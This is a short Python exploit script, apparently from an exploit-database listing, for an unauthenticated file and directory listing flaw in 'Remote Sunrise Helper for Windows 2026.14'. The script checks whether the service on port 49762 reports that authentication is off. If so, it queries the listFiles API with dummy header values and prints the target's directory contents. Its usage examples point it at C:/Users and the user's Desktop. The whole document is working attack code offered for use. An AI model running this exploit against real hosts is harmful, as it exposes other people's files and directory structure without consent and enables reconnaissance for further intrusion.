#!/usr/bin/env python3
# Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
Unauthenticated File/Directory Listing
# Date: 2026-04-20
# Exploit Author: Chokri Hammedi
# Software: https://rs.ltd/latest.php?os=win
# Vendor: https://rs.ltd/
# Version: 2026.14
# Tested on: Windows 10 / Windows 11

import requests, json, sys, urllib3
from urllib.parse import quote
urllib3.disable_warnings()

if len(sys.argv) < 2:
    print(f"Usage: {sys.argv[0]} <target_ip> [path]")
    print(f"Example: {sys.argv[0]} 192.168.1.103")
    print(f"Example: {sys.argv[0]} 192.168.1.103 'C:/Users'")
    print(f"Example: {sys.argv[0]} 192.168.1.103 '%USERPROFILE%/Desktop'")
    sys.exit(1)

target = sys.argv[1]
path = sys.argv[2] if len(sys.argv) > 2 else ""
url = f"https://{target}:49762"
headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}

r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5)
data = r.json()

if data.get("requires.auth") == False:
    if path:
        encoded = quote(path, safe='')
        r = requests.get(f"{url}/api/listFiles={encoded}", headers=headers,
verify=False)
    else:
        r = requests.get(f"{url}/api/listFiles", headers=headers,
verify=False)
    print(json.dumps(r.json(), indent=2))
else:
    print("[*] Not vulnerable - authentication required")